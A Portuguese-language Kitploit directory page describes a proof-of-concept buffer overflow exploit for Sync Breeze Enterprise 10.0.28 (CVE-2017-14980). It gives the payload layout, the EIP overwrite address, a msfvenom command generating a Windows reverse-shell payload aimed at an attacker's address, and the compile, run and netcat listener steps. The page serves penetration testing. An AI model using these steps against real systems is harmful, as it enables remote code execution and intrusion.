Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-14980_syncbreeze_10.0.28_bof — Exploit de estouro de buffer de prova de conceito para Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envia payload HTTP POST malicioso para sobrescrever EIP e executar shellcode x86 personalizado para execução arbitrária de código. | Kitploit
Ferramentas/GitHubGitHub/lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoExploração de Binários
GitHub
lipeozyy/cve-2017-14980_syncbreeze_10.0.28_bof

CVE-2017-14980_syncbreeze_10.0.28_bof

Exploit de estouro de buffer de prova de conceito para Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). Envia payload HTTP POST malicioso para sobrescrever EIP e executar shellcode x86 personalizado para execução arbitrária de código.

Ver Repositório
28há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit - CVE-2017-14980 - Sync Breeze Enterprise v10.0.28

Este repositório contém uma prova de conceito de exploit de buffer overflow (BOF) para o Sync Breeze Enterprise versão 10.0.28, visando a vulnerabilidade identificada como CVE-2017-14980.

Descrição

A vulnerabilidade existe devido à validação inadequada de entrada ao processar o campo password em uma requisição POST para o endpoint /login.
Um atacante pode enviar um valor excessivamente longo neste campo, o que sobrescreve o EIP e permite a execução arbitrária de código.

Este exploit envia uma carga (payload) cuidadosamente elaborada contendo:

  • 520 bytes de preenchimento ('A')
  • 4 bytes para sobrescrever o EIP
  • Um NOP sled de 20 bytes
  • Um shellcode para Windows x86, que pode ser personalizado para executar comandos arbitrários

Como Funciona

  1. O exploit constrói um buffer malicioso contendo o shellcode embutido.
  2. Ele envia uma requisição HTTP POST ao servidor vulnerável com a carga no campo password.
  3. Ao processar a requisição, a aplicação sobrescreve o ponteiro de instrução (EIP) e executa o shellcode fornecido pelo atacante.

Requisitos

  • Um compilador C (ex.: gcc)
  • Acesso de rede a um alvo que esteja executando o Sync Breeze Enterprise 10.0.28
  • Ajuste do endereço do EIP (\x83\x0C\x09\x10) e do shellcode, se necessário

Exemplo de geração de shellcode com msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit

nc -nlvp 4444
Baixar ferramenta